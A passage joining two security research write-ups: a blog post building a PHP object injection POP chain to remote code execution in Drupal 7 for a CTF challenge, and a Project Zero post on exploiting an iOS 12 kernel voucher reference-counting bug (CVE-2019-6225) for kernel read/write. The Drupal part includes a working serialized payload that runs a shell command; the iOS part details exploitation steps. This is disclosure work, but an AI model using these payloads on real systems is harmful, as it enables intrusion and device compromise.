To check whether this assumption was true, we started digging into the internals of the Drupal cache. We found that cache entries are stored in the database, and each cache type has its own table (one cache for forms, one for pages, and so on).

```
MariaDB [drupal7]> SHOW TABLES;
+-----------------------------+
| Tables_in_drupal7           |
+-----------------------------+
...
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
...
```

After a bit more digging, we discovered that the table name corresponds to $this->bin. This means we can set bin to any cache type and inject into any cache table. But what can we do with this? The next step was to analyze the different cache tables for interesting entries and their structure.
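The merge in set() deserves a closer look. Below is a minimal Python model, not Drupal code, of __destruct() and set(). Dicts stand in for PHP arrays and for the cache tables, and locking is left out. PHP's array union operator `+` keeps the left operand's value for duplicate keys. So if an entry with the chosen cid already exists, its existing keys win over the injected ones. That suggests choosing a cid that is not yet in the table. The helper names are illustrative only.

```python
# Toy model of DrupalCacheArray::__destruct() and set(). Dicts replace
# PHP arrays and the database cache tables; locking is omitted.

def php_array_union(left, right):
    """PHP's `$left + $right`: keys already present in `left` win."""
    merged = dict(left)
    for key, value in right.items():
        merged.setdefault(key, value)
    return merged


def cache_set_merged(cid, data, bin_name, cache):
    """Mimic set(): merge with any existing entry, then cache_set()."""
    table = cache.setdefault(bin_name, {})
    if cid in table:                       # cache_get() found an entry
        data = php_array_union(table[cid], data)
    table[cid] = data


def destruct(obj, cache):
    """Mimic __destruct(): persist the flagged keys, then call set()."""
    data = {k: obj["storage"][k]
            for k, persist in obj["keysToPersist"].items() if persist}
    if data:                               # if (!empty($data))
        cache_set_merged(obj["cid"], data, obj["bin"], cache)


cache = {}
injected = {
    "cid": "some_cache_key",
    "bin": "cache_form",
    "keysToPersist": {"input_data": True},
    "storage": {"input_data": ["arbitrary data!"]},
}
destruct(injected, cache)
print(cache)  # {'cache_form': {'some_cache_key': {'input_data': ['arbitrary data!']}}}
```

Running a second injected object against the same cid would only add new keys. It would not replace `input_data`.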
```
MariaDB [drupal7]> DESC cache_form;
+------------+--------------+------+-----+---------+-------+
| Field      | Type         | Null | Key | Default | Extra |
+------------+--------------+------+-----+---------+-------+
| cid        | varchar(255) | NO   | PRI |         |       |
| data       | longblob     | YES  |     | NULL    |       |
| expire     | int(11)      | NO   | MUL | 0       |       |
| created    | int(11)      | NO   |     | 0       |       |
| serialized | smallint(6)  | NO   |     | 0       |       |
+------------+--------------+------+-----+---------+-------+
```

For example, the cache_form table has a column called cid. As a reminder, one of the arguments to cache_set() was $this->cid. We assumed the following:
- $this->cid maps to the cid column of the cache table selected by $this->bin.
- cid is the key of a cache entry, and the data column simply holds the $data parameter of cache_set().

To verify these assumptions, we created a serialized payload locally by writing a class in a build.php file, and then unserialized it on our test Drupal setup:

```php
<?php
class SchemaCache {
  // Insert an entry with some cache_key
  protected $cid = "some_cache_key";
  // Insert it into the cache_form table
  protected $bin = "cache_form";
  protected $keysToPersist = array('input_data' => true);
  protected $storage = array('input_data' => array("arbitrary data!"));
}
$schema = new SchemaCache();
echo serialize($schema);
```

We used the SchemaCache class because it extends DrupalCacheArray. DrupalCacheArray is abstract and cannot be instantiated on its own, so a concrete subclass is needed.
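The following is a minimal Python sketch of PHP's serialize() format. It shows what such a payload looks like on the wire and covers only the value types used in this writeup. Protected properties are prefixed with `\0*\0`, so their serialized names are three bytes longer than they appear. `php_serialize` and `php_serialize_object` are hypothetical helpers, not part of PHP or Drupal. Floats, null, references and private properties are deliberately left out.

```python
# Minimal sketch of PHP's serialize() format for str, int, bool, list,
# dict, and objects with protected properties only.

def php_serialize(value):
    if isinstance(value, bool):              # test bool before int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        raw = value.encode("utf-8")          # PHP lengths are byte counts
        return 's:%d:"%s";' % (len(raw), value)
    if isinstance(value, list):              # a PHP list has keys 0..n-1
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v)
                       for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def php_serialize_object(class_name, protected_props):
    # Protected property names are serialized as "\0*\0name".
    body = "".join(php_serialize("\0*\0" + name) + php_serialize(v)
                   for name, v in protected_props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(class_name), class_name,
                                  len(protected_props), body)


print(php_serialize({"input_data": ["arbitrary data!"]}))
# -> a:1:{s:10:"input_data";a:1:{i:0;s:15:"arbitrary data!";}}
```

The printed string matches the data column of the cache_form row that this writeup's SELECT query returns. That row is the persisted `$data`, not the whole object.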
Deserializing this data led to the following entry being created in the cache_form table:

```
MariaDB [drupal7]> SELECT * FROM cache_form;
+----------------+-----------------------------------------------------------+--------+------------+------------+
| cid            | data                                                      | expire | created    | serialized |
+----------------+-----------------------------------------------------------+--------+------------+------------+
| some_cache_key | a:1:{s:10:"input_data";a:1:{i:0;s:15:"arbitrary data!";}} |      0 | 1548684864 |          1 |
+----------------+-----------------------------------------------------------+--------+------------+------------+
```

Using the injected cached data to gain Remote Code Execution

Now that we could inject arbitrary data into any cache table, we looked for places where Drupal reads the cache in a way that could lead to Remote Code Execution. After a bit of searching, we found the following Ajax callback. It can be triggered by making a request to the URL http://drupalurl.org/?q=system/ajax:

```php
function ajax_form_callback() {
  list($form, $form_state, $form_id, $form_build_id, $commands) = ajax_get_form();
  drupal_process_form($form['#form_id'], $form, $form_state);
}
```

The ajax_get_form() function internally uses cache_get() to retrieve a cached entry from the cache_form table:

```php
if ($cached = cache_get('form_' . $form_build_id, 'cache_form')) {
  $form = $cached->data;
  ...
  return $form;
}
```

This is interesting because it means an arbitrary form render array can be passed to drupal_process_form(). The Drupalgeddon 2 vulnerability abused this same feature. Chances were therefore high that injecting arbitrary render arrays into the rendering engine would lead to code execution.
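The second-order nature of the chain can be modeled with a couple of dicts. One request plants an entry under cid `form_1337` in cache_form. A later Ajax request then names that entry through its form_build_id. This is a hypothetical Python model of the lookup only, not Drupal's database layer.

```python
# Toy model: the cache tables are nested dicts keyed by bin, then cid.
cache_tables = {"cache_form": {}}


def cache_set(cid, data, bin_name):
    cache_tables.setdefault(bin_name, {})[cid] = data


def cache_get(cid, bin_name):
    return cache_tables.get(bin_name, {}).get(cid)


def ajax_get_form(form_build_id):
    # Mirrors cache_get('form_' . $form_build_id, 'cache_form')
    return cache_get("form_" + str(form_build_id), "cache_form")


# Request 1: the injected object's destructor writes under cid "form_1337".
cache_set("form_1337", {"#form_id": 1337}, "cache_form")
# Request 2: a POST to ?q=system/ajax with form_build_id=1337 reads it back.
print(ajax_get_form("1337"))  # {'#form_id': 1337}
```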
Within drupal_process_form(), we found the following lines of code:

```php
if (isset($element['#process']) && !$element['#processed']) {
  foreach ($element['#process'] as $process) {
    $element = $process($element, $form_state, $form_state['complete form']);
  }
  // ...
}
```

Here, $element refers to the $form received via cache_get(), so the keys and values of the array can be set arbitrarily. This means we can set an arbitrary process (#process) callback and have it executed with the render array as its first argument. Because that first argument is an array, a function such as system() cannot be called directly. What is needed is a function that takes an array as input and leads to RCE. The drupal_process_attached() function seemed very promising:

```php
function drupal_process_attached($elements, $group = JS_DEFAULT, $dependency_check = FALSE, $every_page = NULL) {
  ...
  foreach ($elements['#attached'] as $callback => $options) {
    if (function_exists($callback)) {
      foreach ($elements['#attached'][$callback] as $args) {
        call_user_func_array($callback, $args);
      }
    }
  }
  return $success;
}
```

Since all array keys and values can be set arbitrarily, it is possible to call an arbitrary function with arbitrary arguments via call_user_func_array(), which leads to RCE!
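A simplified Python model of the two callback hops explains why the payload nests the command as `array(array('sleep 20'))`. Each value under a `#attached` callback is a list of argument lists, and each inner list is spread into one call_user_func_array() invocation. In this sketch, a dict of harmless functions stands in for PHP's global function table, so function_exists() becomes a membership test. The recorded "system" call never touches the host.

```python
# Toy model of '#process' -> drupal_process_attached() -> call_user_func_array().
calls = []

# Stand-in for PHP's global function table; "system" only records its argument.
FUNCTIONS = {
    "system": lambda cmd: calls.append(("system", cmd)),
}


def drupal_process_attached(elements, *_ignored):
    for callback, options in elements.get("#attached", {}).items():
        if callback in FUNCTIONS:               # function_exists($callback)
            for args in options:
                FUNCTIONS[callback](*args)      # call_user_func_array($callback, $args)
    return True


FUNCTIONS["drupal_process_attached"] = drupal_process_attached


def process_element(element, form_state):
    # Mirrors the '#process' loop quoted from drupal_process_form().
    if "#process" in element and not element.get("#processed"):
        for process in element["#process"]:
            element = FUNCTIONS[process](element, form_state,
                                         form_state.get("complete form"))
    return element


form = {
    "#form_id": 1337,
    "#process": ["drupal_process_attached"],
    "#attached": {"system": [["sleep 20"]]},
}
process_element(form, {})
print(calls)  # [('system', 'sleep 20')]
```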
This means the final POP chain looks like this:

```php
<?php
class SchemaCache {
  // Insert an entry with some cache_key
  protected $cid = "form_1337";
  // Insert it into the cache_form table
  protected $bin = "cache_form";
  protected $keysToPersist = array(
    '#form_id' => true,
    '#process' => true,
    '#attached' => true
  );
  protected $storage = array(
    '#form_id' => 1337,
    '#process' => array('drupal_process_attached'),
    '#attached' => array(
      'system' => array(array('sleep 20'))
    )
  );
}
$schema = new SchemaCache();
echo serialize($schema);
```

All that is left is to trigger the PHP Object Injection vulnerability with the resulting serialized string. Then make a POST request to http://drupalurl.org/?q=system/ajax with the POST parameter form_build_id set to 1337 to trigger the RCE.

Conclusion

POP chains can often become more complex and require deeper knowledge of the application. However, the purpose of this blog post was to demonstrate that exploitation is still possible even if no obvious, first-order POP chain exists. If we had not known that Drupal's rendering API uses a lot of callbacks and has had vulnerabilities in the past, we probably would not have found this particular POP chain. Alternatively, deep PHP knowledge can also lead to working POP chains when no obvious one can be found. Another POP chain exists: Object Instantiation to Blind XXE to File Read to SQL Injection to RCE. A writeup for it was written by Paul Axe and can be found here. We would also like to thank the creators of this and the other amazing challenges of the Insomni’hack CTF 2019.

Author: Simon Scannell, Security Researcher. Simon is a self-taught security researcher at RIPS Technologies. He is passionate about web application security and about finding new ways to discover and exploit vulnerabilities.
He currently focuses on the analysis of popular content management systems and their security architecture. Source: https://blog.ripstech.com/2019/complex-drupal-pop-chain/
  3. Tuesday, January 29, 2019

voucher_swap: Exploiting MIG reference counting in iOS 12

Posted by Brandon Azad, Project Zero

In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS.

A curious discovery

MIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new. For example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2.

Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows:
- If a MIG service routine returns success, then it took ownership of all resources passed in.
- If a MIG service routine returns failure, then it took ownership of none of the resources passed in.

Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs.

The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics.
Here's the relevant code from _Xsemaphore_destroy():

```c
task = convert_port_to_task(In0P->Head.msgh_request_port);

OutP->RetCode = semaphore_destroy(task,
        convert_port_to_semaphore(In0P->semaphore.name));
task_deallocate(task);
#if __MigKernelSpecificCode
if (OutP->RetCode != KERN_SUCCESS) {
    MIG_RETURN_ERROR(OutP, OutP->RetCode);
}

if (IP_VALID((ipc_port_t)In0P->semaphore.name))
    ipc_port_release_send((ipc_port_t)In0P->semaphore.name);
#endif /* __MigKernelSpecificCode */
```

The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy():
- On success, semaphore_destroy() should consume the semaphore reference.
- On failure, semaphore_destroy() should still consume the semaphore reference.

Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure.

This of course raises the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules?

A bad swap

Not long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher(). This is the MIG definition from osfmk/mach/task.defs:

```
routine task_swap_mach_voucher(
        task        : task_t;
        new_voucher : ipc_voucher_t;
  inout old_voucher : ipc_voucher_t);
```

And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper:

```c
mig_internal novalue _Xtask_swap_mach_voucher
        (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
...
    kern_return_t RetCode;
    task_t task;
    ipc_voucher_t new_voucher;
    ipc_voucher_t old_voucher;
...
    task = convert_port_to_task(In0P->Head.msgh_request_port);

    new_voucher = convert_port_to_voucher(In0P->new_voucher.name);

    old_voucher = convert_port_to_voucher(In0P->old_voucher.name);

    RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);

    ipc_voucher_release(new_voucher);

    task_deallocate(task);

    if (RetCode != KERN_SUCCESS) {
        MIG_RETURN_ERROR(OutP, RetCode);
    }
...
    if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);

    if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
...
    OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);

    OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
    OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
    OutP->msgh_body.msgh_descriptor_count = 1;
}
```

Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher():
- task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed.
- task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume.
- On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object.
- On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port().

With these semantics in mind, we can compare against the actual implementation.
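The inferred contract can be checked mechanically with the toy Python model below. It makes two assumptions: only voucher references matter (send rights are ignored), and convert_voucher_to_port() consumes exactly one reference. The wrapper runs twice. The first run uses a hypothetical implementation (`honours_contract`) that follows the inferred rules. The second uses the one-line placeholder that XNU 4903.221.2 ships, `*in_out_old_voucher = new_voucher`.

```python
from collections import Counter

# Toy reference-count model of _Xtask_swap_mach_voucher(). Vouchers are
# plain strings; refs maps each voucher to its reference-count delta.


def mig_wrapper(impl, refs, new_voucher, old_voucher):
    refs[new_voucher] += 1        # convert_port_to_voucher(new)
    refs[old_voucher] += 1        # convert_port_to_voucher(old)
    ok, out = impl(refs, new_voucher, old_voucher)
    refs[new_voucher] -= 1        # ipc_voucher_release(new_voucher)
    if ok:
        refs[out] -= 1            # convert_voucher_to_port() consumes one ref
    return refs


def honours_contract(refs, new_voucher, in_old):
    """Hypothetical implementation following the inferred rules."""
    refs[in_old] -= 1             # consume the input old_voucher reference
    refs[new_voucher] += 1        # donate a fresh reference on the output
    return True, new_voucher


def placeholder(refs, new_voucher, in_old):
    """The shipped placeholder: *in_out_old_voucher = new_voucher."""
    return True, new_voucher


for impl in (honours_contract, placeholder):
    print(impl.__name__, dict(mig_wrapper(impl, Counter(), "A", "B")))
# honours_contract {'A': 0, 'B': 0}
# placeholder {'A': -1, 'B': 1}
```

Under these assumptions the contract-following version is net zero. The placeholder drops one reference on the voucher passed as new_voucher ("A") and leaks one on the voucher passed as old_voucher ("B").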
Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation:

```c
kern_return_t
task_swap_mach_voucher(
        task_t          task,
        ipc_voucher_t   new_voucher,
        ipc_voucher_t   *in_out_old_voucher)
{
    if (TASK_NULL == task)
        return KERN_INVALID_TASK;

    *in_out_old_voucher = new_voucher;
    return KERN_SUCCESS;
}
```

This implementation does not respect the intended semantics:
- The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference.
- The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own.

Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count.

(Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.)

On vouchers

In order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation.

Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition:

```c
/*
 * IPC Voucher
 *
 * Vouchers are a reference counted immutable (once-created) set of
 * indexes to particular resource manager attribute values
 * (which themselves are reference counted).
 */
struct ipc_voucher {
    iv_index_t      iv_hash;        /* checksum hash */
    iv_index_t      iv_sum;         /* checksum of values */
    os_refcnt_t     iv_refs;        /* reference count */
    iv_index_t      iv_table_size;  /* size of the voucher table */
    iv_index_t      iv_inline_table[IV_ENTRIES_INLINE];
    iv_entry_t      iv_table;       /* table of voucher attr entries */
    ipc_port_t      iv_port;        /* port representing the voucher */
    queue_chain_t   iv_hash_link;   /* link on hash chain */
};
```

As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library.

The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit.

As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic.

iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL.

In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one.

That's out of line!
There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers. Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed. But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless. Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field. Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher. Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. 
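The sequence that leaves ith_voucher dangling can be traced with a few counters. This is a simplified Python sketch under two assumptions: the voucher port holds exactly one voucher reference, and each use of the bug with the voucher as new_voucher drops exactly one reference. The class and method names are illustrative, and the range check mirrors the os_refcnt_t limits described earlier.

```python
OS_REFCNT_MAX = 0x0FFFFFFF


class Voucher:
    def __init__(self):
        self.refs = 1            # reference held by the voucher port (assumed)
        self.freed = False

    def _check(self):
        # os_refcnt_t panics on counts outside 1..0x0fffffff
        assert 1 <= self.refs <= OS_REFCNT_MAX, "os_refcnt panic"

    def retain(self):
        self._check()
        self.refs += 1

    def release(self):
        self._check()
        self.refs -= 1
        if self.refs == 0:
            self.freed = True    # memory goes back to the ipc.vouchers zone


class Thread:
    def __init__(self):
        self.ith_voucher = None


voucher, thread = Voucher(), Thread()
thread.ith_voucher = voucher     # thread_set_mach_voucher() stores a pointer...
voucher.retain()                 # ...and takes a reference
voucher.release()                # bug: voucher passed as new_voucher
voucher.release()                # userspace deallocates the voucher port
print(voucher.freed, thread.ith_voucher is voucher)  # True True
```

The thread still points at a voucher whose count reached zero. That is exactly the dangling pointer the next steps reuse.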
Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object. In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid. But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace. This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers. Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. 
That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want. Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic. The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer. This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot. 
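The overlap arithmetic can be sketched in Python. The sketch assumes what the text states: a 0x50-byte ipc_voucher with iv_refs at offset 0x8, laid over an array of 8-byte little-endian pointers. Because 0x50 is a multiple of 8, every voucher slot's iv_refs lands on the low half of some pointer. The kernel addresses are made up for illustration. MACH_PORT_DEAD is represented as an all-ones pointer, which matches the 0xffffffff value mentioned above.

```python
import struct

IV_REFS_OFFSET = 0x8
OS_REFCNT_MAX = 0x0FFFFFFF


def iv_refs_view(ool_ports, voucher_offset):
    """The u32 the kernel would read as iv_refs for a voucher at voucher_offset."""
    raw = b"".join(struct.pack("<Q", p) for p in ool_ports)
    (refs,) = struct.unpack_from("<I", raw, voucher_offset + IV_REFS_OFFSET)
    return refs


def refs_valid(refs):
    return 1 <= refs <= OS_REFCNT_MAX


def bump_pointer(ptr, n):
    """Leaking n voucher references adds n to the low 32 bits of the pointer."""
    low = (ptr & 0xFFFFFFFF) + n
    assert refs_valid(low), "would leave the allowed refcount range"
    return (ptr & ~0xFFFFFFFF) | low


MACH_PORT_DEAD_PTR = 0xFFFFFFFFFFFFFFFF
base_port = 0xFFFFFFE0_0A3C1200          # hypothetical kernel address

# A voucher at offset 0 overlaps elements 0-9; iv_refs is element 1's low half.
for candidate in (0, MACH_PORT_DEAD_PTR, base_port):
    refs = iv_refs_view([0, candidate], 0)
    print(hex(refs), refs_valid(refs))
# 0x0 False
# 0xffffffff False
# 0xa3c1200 True
print(hex(bump_pointer(base_port, 0x4000)))  # 0xffffffe00a3c5200
```

Each leaked voucher reference moves the pointer forward by exactly one byte. Reaching pipe buffers N bytes past the base port therefore costs N leaks, and the low half must stay within 1-0x0fffffff throughout.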
This gives us our working strategy to exploit this bug:
1. Allocate a page of Mach vouchers.
2. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability.
3. Deallocate the voucher ports, freeing all the vouchers.
4. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL.
5. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports.
6. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead.
7. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port.

Pipe dreams

So what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port.

Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers. Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead.

At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors.
tfp0

Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic.

We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point.

We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory.

An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages.

In order to get the address of the pipe buffer, we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer.
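The address arithmetic behind the pid_for_task() read can be sketched in Python. In this sketch a bytearray stands in for kernel memory, and P_PID_OFFSET is a hypothetical offset of p_pid within struct proc; the real value is build-specific. The point is only this: setting bsd_info = target - offsetof(p_pid) makes the returned "pid" equal the 4 bytes at the target. A 64-bit read then costs two such reads, which means two leaked ipc_kmsg structs in the real exploit.

```python
import struct

P_PID_OFFSET = 0x60   # hypothetical offsetof(struct proc, p_pid)


def pid_for_task(memory, bsd_info):
    """What the fake task port yields: the 4 bytes at bsd_info->p_pid."""
    return struct.unpack_from("<I", memory, bsd_info + P_PID_OFFSET)[0]


def kread32(memory, address):
    # Aim the fake task's bsd_info so that &bsd_info->p_pid == address.
    return pid_for_task(memory, address - P_PID_OFFSET)


def kread64(memory, address):
    # Two 4-byte reads, low half first (little-endian).
    low = kread32(memory, address)
    high = kread32(memory, address + 4)
    return low | (high << 32)


memory = bytearray(0x200)                       # stand-in for kernel memory
struct.pack_into("<Q", memory, 0x100, 0xFFFFFFF0_07004000)
print(hex(kread64(memory, 0x100)))              # 0xfffffff007004000
```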
At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory.

And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code.

Bug collision

